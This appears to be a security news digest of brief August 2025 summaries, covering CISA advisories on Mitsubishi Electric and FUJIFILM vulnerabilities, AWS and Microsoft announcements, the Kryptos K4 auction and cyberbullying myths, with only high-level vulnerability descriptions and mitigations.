🔒 CISA published Advisory ICSA-25-233-01 on August 21, 2025 describing a Denial-of-Service vulnerability (CVE-2025-5514, CVSS v3 5.3) in the Mitsubishi Electric MELSEC iQ-F Series CPU module web server. An attacker can send specially crafted HTTP requests that exploit an Improper Handling of Length Parameter Inconsistency to delay processing and prevent legitimate users from accessing the web server. Mitsubishi Electric reports no plans to release a fix and advises customers to restrict network exposure, use IP filtering and VPNs, and limit physical access. CISA recommends isolating control networks behind firewalls and minimizing internet exposure.

Thu, August 21, 2025

FUJIFILM Synapse Mobility Privilege Escalation Advisory

🔒 FUJIFILM Healthcare Americas Corporation has released fixes for a privilege-escalation vulnerability (CVE-2025-54551) affecting Synapse Mobility. The issue is an external control of an assumed-immutable web parameter that can be abused remotely with low attack complexity; CVSS v4 score is 5.3. FUJIFILM recommends upgrading to 8.2 or applying patches for 8.0–8.1.1. Immediate mitigations include disabling the configurator search function or unchecking "Allow plain text accession number," and CISA advises minimizing network exposure and using secure remote access.

Thu, August 21, 2025

AWS IoT Core Adds Customer-Managed KMS Keys Support

🔐 AWS IoT Core now supports customer-managed keys (CMK) via AWS KMS, enabling encryption of data stored in IoT Core with customer-controlled keys. When CMK is selected, AWS automatically re-encrypts existing stored data and manages the transition to avoid operational disruption. The feature is available in all Regions where IoT Core is supported and enhances control over key lifecycle — creation, rotation, monitoring, and deletion.

Thu, August 21, 2025

AWS Incident Response Achieves HITRUST CSF Certification

🔒 AWS Security Incident Response is now HITRUST CSF certified, demonstrating alignment with rigorous security and privacy controls used by healthcare, life sciences, and other regulated sectors. The certification confirms that organizations can leverage AWS Security Incident Response to automate alert monitoring, streamline incident coordination, and access 24/7 security experts. Customers can inherit AWS HITRUST scores to reduce audit burden and integrate via console, CLI, or APIs.

Thu, August 21, 2025

Microsoft Named Leader in 2025 Gartner Magic Quadrant

🚀 Microsoft has been named a Leader in the 2025 Gartner Magic Quadrant for Cloud-Native Application Platforms and is positioned furthest to the right in Completeness of Vision. The announcement highlights a developer-first approach across containers, functions, APIs, and web frameworks, with integrated tools such as GitHub Copilot and Visual Studio. Azure emphasizes AI-native capabilities through Azure AI Foundry and platform innovations designed to accelerate agentic applications for enterprise scenarios.

Thu, August 21, 2025

Sanborn Auctions Kryptos Part Four Solution at RR Auction

🔐 Jim Sanborn is auctioning the original solution to Part Four (K4) of his Kryptos sculpture, with RR Auction estimating a winning bid of $300,000–$500,000 for the lot. The sale, scheduled for Nov. 20, includes the handwritten plaintext, related papers, and a 12-by-18-inch copper proof-of-concept plate with 1,800 hand-cut letters. Sanborn hopes the buyer will preserve the secret and assume verification duties, potentially by implementing an automated review process.

Thu, August 21, 2025

Debunking Cyberbullying Myths: What Parents Should Know

🔍 This article debunks ten common cyberbullying myths that can mislead parents and educators. It cites rising rates of online harassment among US middle- and high-school students and explains why beliefs such as “what happens online stays online” or “remove the tech and you solve it” are false. The piece urges open dialogue, vigilance for behavioral signs, and collaborative plans to support children.